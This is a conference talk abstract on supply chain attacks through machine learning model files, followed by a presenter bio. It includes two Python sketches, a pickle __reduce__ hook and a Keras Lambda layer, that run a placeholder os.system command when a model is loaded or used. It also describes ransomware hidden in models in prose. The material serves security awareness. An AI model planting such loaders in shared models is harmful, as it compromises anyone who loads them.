Malice in Chains: Supply Chain Attacks using Machine Learning Models

This past year marked a rapid acceleration in the adoption of artificial intelligence. As AI-based solutions have started to dominate the market, a new cyber attack vector has opened up, taking CISOs by surprise: the exploitation of the underlying machine learning models. These models are often treated as black boxes that process input data and compute output, communicating with users through an API or UI while their internals remain hidden. However, it is crucial to understand that these models are essentially code - and, as such, can be manipulated in unexpected and potentially malicious ways. ML models are stored, shared, and transferred using serialization formats such as JSON, pickle, and HDF5. While some of these formats are known to be vulnerable, there is still not enough clarity on how attackers can subvert models in practice and how subverted models can be used to inflict real damage on victims.
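To illustrate why pickle-based model files are risky, the sketch below shows how pickle's __reduce__ hook lets an object specify code that runs the moment the file is deserialized. This is a minimal, harmless illustration rather than material from the talk; the file name and echoed command are placeholders.

```python
import os
import pickle

class MaliciousModel:
    """A stand-in 'model' object that abuses pickle's __reduce__ hook."""

    def __reduce__(self):
        # Whatever callable and arguments are returned here are executed
        # by pickle.load() during deserialization - before the victim has
        # any chance to inspect the resulting object.
        return (os.system, ("echo 'arbitrary code ran during deserialization'",))

# Attacker side: produce a file that looks like a serialized model.
with open("model.pkl", "wb") as f:
    pickle.dump(MaliciousModel(), f)

# Victim side: simply loading the "model" is enough to trigger the payload.
with open("model.pkl", "rb") as f:
    pickle.load(f)
```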


Unlike traditional software, ML artifacts are not routinely checked for integrity, cryptographically signed, or even scanned by anti-malware solutions, which makes them the perfect target for cyber adversaries looking to fly under the radar. In this talk, we show how an adversary can abuse machine learning models to carry out highly damaging supply chain attacks. We start by exploring several model serialization formats used by popular ML libraries, including PyTorch, Keras, TensorFlow, and scikit-learn. We show how each of these formats can be exploited to execute arbitrary code and bypass security measures, leading to the compromise of critical ML infrastructure. We present various code execution methods in Python’s pickle format, show how Keras lambda layers can be abused in HDF5, exploit the SavedModel file format via unsafe TensorFlow I/O operations, and more. Finally, we demonstrate a supply chain attack scenario in which a ransomware payload is hidden inside an ML model using steganography and then reconstructed and executed through a serialization vulnerability when the model is loaded into memory.
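As a concrete illustration of one of these vectors, the sketch below shows how a Keras Lambda layer can carry an attacker-chosen side effect that is serialized into an HDF5 model file and re-executed on the victim's machine when the model is used. It is a simplified approximation under stated assumptions, not the exact technique demonstrated in the talk; the file name and echoed command are placeholders, and exact loading behavior varies by Keras version.

```python
import tensorflow as tf

def payload(x):
    # Benign stand-in for a real payload; the function body is serialized
    # into the HDF5 file along with the layer configuration.
    import os
    os.system("echo 'code execution via Lambda layer'")
    return x  # pass the tensor through unchanged so the model still "works"

# Attacker side: build and save a model whose Lambda layer embeds the payload.
inputs = tf.keras.Input(shape=(1,))
outputs = tf.keras.layers.Lambda(payload)(inputs)
tf.keras.Model(inputs, outputs).save("model.h5")

# Victim side: loading and invoking the model runs the embedded function.
# (Recent Keras releases may require safe_mode=False to deserialize lambdas -
# a warning that users fetching "just a model" are often inclined to bypass.)
loaded = tf.keras.models.load_model("model.h5")
loaded(tf.constant([[1.0]]))
```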

With the rise of public model repositories such as Hugging Face, businesses are increasingly adopting pre-trained models in their environments, often unaware of the associated risks. Our aim is to prove that machine learning artifacts can be exploited and manipulated in the same way as any other software, and should be treated as such - with utmost care and caution.

 

About the Presenter: Marta Janus

Marta is a Principal Researcher at HiddenLayer, where she focuses on investigating adversarial machine learning attacks and the overall security of AI-based solutions. Before joining HiddenLayer, Marta spent over a decade working as a security researcher for leading anti-virus vendors. She has extensive experience in cyber security, threat intelligence, malware analysis, and reverse engineering. Throughout her career, Marta has produced more than three dozen publications across HiddenLayer, BlackBerry, Cylance, Securelist, and DARKReading. She has also presented at industry conferences such as REcon Montreal, 44Con, BSidesSF, and Defcon AIVillage.
